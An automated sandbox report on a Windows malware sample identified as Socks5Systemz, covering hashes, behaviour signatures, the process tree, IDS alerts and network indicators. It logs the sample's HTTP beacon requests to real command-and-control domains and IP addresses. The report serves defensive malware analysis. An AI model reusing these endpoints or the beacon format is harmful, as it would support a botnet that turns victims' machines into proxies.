Windows Analysis Report
KRdh0OaXqH.exe

Overview

General Information

Sample name: KRdh0OaXqH.exe (renamed because the original name is a hash value)
Original sample name: 61ab9f06b48b8df40ce15ce9252c0531.exe
Analysis ID: 1575229
MD5: 61ab9f06b48b8df40ce15ce9252c0531
SHA1: 02d1610e771bea84c27aafd05df21dcb300420e5
SHA256: 732bccaeb50d50526b5f6c8817ce889d04fb7b67a52b88f79e223d4cf9b807ae
Tags: exe, Socks5Systemz, user-abuse_ch

Detection

Petite Virus, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • KRdh0OaXqH.exe (PID: 4512 cmdline: "C:\Users\user\Desktop\KRdh0OaXqH.exe" MD5: 61AB9F06B48B8DF40CE15CE9252C0531)
    • KRdh0OaXqH.tmp (PID: 2828 cmdline: "C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp" /SL5="$10440,6991381,54272,C:\Users\user\Desktop\KRdh0OaXqH.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 4816 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 4284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 2276 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
      • net.exe (PID: 3576 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 6516 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 5884 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: BB0124F16D88C4EC1FCFD9E524A5B921)
  • cleanup
{"C2 list": ["goeiwef.com"]}
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\CRTGame\bin\x86\is-SG9N2.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-MDCMM.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-O5AH5.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-V3CB3.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |
C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp | JoeSecurity_PetiteVirus | Yara detected Petite Virus | Joe Security |

Source | Rule | Description | Author | Strings
00000007.00000002.3292206926.0000000002A31000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
00000007.00000002.3291926333.0000000000A25000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
Process Memory Space: crtgame.exe PID: 5884 | JoeSecurity_Socks5Systemz | Yara detected Socks5Systemz | Joe Security |
No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T20:08:04.972631+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:18.112716+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:31.253208+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49848 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:50.004899+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:53.823630+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:55.343124+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49920 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:56.958667+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:58.465548+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:59.978702+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49934 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:01.494245+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49936 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:03.069320+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:04.592642+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49947 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:06.109041+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49953 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:07.633464+0100 | 2049467 | 1 | A Network Trojan was detected | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-14T20:08:04.972631+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:18.112716+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:31.253208+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49848 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:50.004899+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:53.823630+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:55.343124+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49920 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:56.958667+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:58.465548+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:59.978702+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49934 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:01.494245+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49936 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:03.069320+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:04.592642+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49947 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:06.109041+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49953 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:07.633464+0100 | 2049468 | 1 | A Network Trojan was detected | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP


                  AV Detection

Source: KRdh0OaXqH.exe | Avira: detected
Source: crtgame.exe.5884.7.memstrmin | Malware Configuration Extractor: Socks5Systemz {"C2 list": ["goeiwef.com"]}
Source: KRdh0OaXqH.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Unpacked PE file: 5.2.crtgame.exe.400000.0.unpack
Source: KRdh0OaXqH.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb | source: is-AE6QK.tmp.1.dr
Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb | source: is-BUF5F.tmp.1.dr
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp | Code function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49818 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49818 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49788 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49788 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49923 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49923 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49848 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49848 -> 94.232.249.187:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49934 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49934 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49947 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49947 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49955 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49955 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49904 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49904 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49936 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49936 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49953 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49953 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49920 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49920 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49929 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49929 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49942 -> 185.237.206.129:80
Source: Network traffic | Suricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49942 -> 185.237.206.129:80
Source: Malware configuration extractor | URLs: goeiwef.com
Source: global traffic | TCP traffic: 192.168.2.5:49909 -> 46.8.225.74:2023
Source: Joe Sandbox View | ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY
Source: Joe Sandbox View | ASN Name: ITLDC-NLUA
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1 Host: ayptoht.ru User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1 Host: goeiwef.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: global traffic | HTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069038dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd13ceda5ebb22 HTTP/1.1 Host: goeiwef.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Source: unknown | TCP traffic detected without corresponding DNS query: 46.8.225.74
Source: unknown | UDP traffic detected without corresponding DNS query: 81.31.197.38
Source: unknown | UDP traffic detected without corresponding DNS query: 194.49.94.194
Source: unknown | UDP traffic detected without corresponding DNS query: 152.89.198.214
Source: C:\Program Files (x86)\CRTGame\crtgame.exe | Code function: 7_2_02A32B95 WSASetLastError,WSARecv,WSASetLastError,select,7_2_02A32B95
Source: global traffic | DNS traffic detected: DNS query: ayptoht.ru
Source: global traffic | DNS traffic detected: DNS query: goeiwef.com
Source: crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/
Source: crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.00000000009B3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde
Source: crtgame.exe, 00000007.00000002.3291501599.00000000009A7000.00000004.00000020.00020000.00000000.sdmp, crtgame.exe, 00000007.00000002.3291501599.0000000000927000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.237.206.129/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde
Source: crtgame.exe, 00000007.00000002.3291501599.0000000000988000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.232.249.187/
Source: crtgame.exe, 00000007.00000002.3291501599.000000000099D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://94.232.249.187/click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde2
Source: is-QOSQ7.tmp.1.dr | String found in binary or memory: http://LosslessAudio.org/0
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0
Source: is-AE6QK.tmp.1.dr | String found in binary or memory: http://code.google.com/p/mp4v2D
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0
Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.dr | String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: is-BUF5F.tmp.1.dr | String found in binary or memory: http://lame.sf.net
Source: is-BUF5F.tmp.1.dr | String found in binary or memory: http://lame.sf.net32bits
Source: is-2BNI8.tmp.1.dr | String found in binary or memory: http://mingw-w64.sourceforge.net/X
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
                  Source: is-9QS5M.tmp.1.dr, is-RUH59.tmp.1.dr, is-TF38E.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0O
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: http://ocsp.sectigo.com0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://ocsps.ssl.com0Q
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: KRdh0OaXqH.tmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drString found in binary or memory: http://www.innosetup.com/
                  Source: is-BUF5F.tmp.1.drString found in binary or memory: http://www.mp3dev.org/
                  Source: is-BUF5F.tmp.1.drString found in binary or memory: http://www.mp3dev.org/ID3Error
                  Source: is-H36N8.tmp.1.drString found in binary or memory: http://www.mpg123.de
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.tmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drString found in binary or memory: http://www.remobjects.com/ps
                  Source: KRdh0OaXqH.exe, 00000000.00000003.2045167392.0000000002128000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.exe, 00000000.00000003.2044999895.0000000002390000.00000004.00001000.00020000.00000000.sdmp, KRdh0OaXqH.tmp, 00000001.00000000.2045600453.0000000000401000.00000020.00000001.01000000.00000004.sdmp, KRdh0OaXqH.tmp.0.dr, is-4K1KF.tmp.1.drString found in binary or memory: http://www.remobjects.com/psU
                  Source: is-9OEDN.tmp.1.drString found in binary or memory: http://www.sqlite.org/copyright.html.
                  Source: is-RDHKR.tmp.1.drString found in binary or memory: https://gcc.gnu.org/bugs/):
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunk
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svn/trunkrepository
                  Source: is-AE6QK.tmp.1.drString found in binary or memory: https://mp4v2.googlecode.com/svnrepository
                  Source: is-RUH59.tmp.1.dr, is-TF38E.tmp.1.drString found in binary or memory: https://sectigo.com/CPS0
                  Source: is-UJQGJ.tmp.1.drString found in binary or memory: https://streams.videolan.org/upload/
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: https://www.digicert.com/CPS0
                  Source: is-9QS5M.tmp.1.dr, is-UT63K.tmp.1.drString found in binary or memory: https://www.ssl.com/repository0

                  System Summary

                  Source: is-V3CB3.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-V3CB3.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-82P0C.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-82P0C.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-SG9N2.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-SG9N2.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-9QS5M.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-0NR14.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-0NR14.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-HBA5G.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-HBA5G.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-UT63K.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-3PB3G.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-3PB3G.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-3PB3G.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-O5AH5.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-O5AH5.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-2JFSM.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-2JFSM.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-2JFSM.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-H4RQI.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-H4RQI.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-MSL58.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-MSL58.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-BLG4U.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-BLG4U.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-BLG4U.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-MDCMM.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-MDCMM.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-DC7IR.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-DC7IR.tmp.1.dr Static PE information: section name: (empty)
                  Source: is-DC7IR.tmp.1.dr Static PE information: section name: (empty)
                  Source: C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp Code function: 1_2_0042F394 NtdllDefWindowProc_A
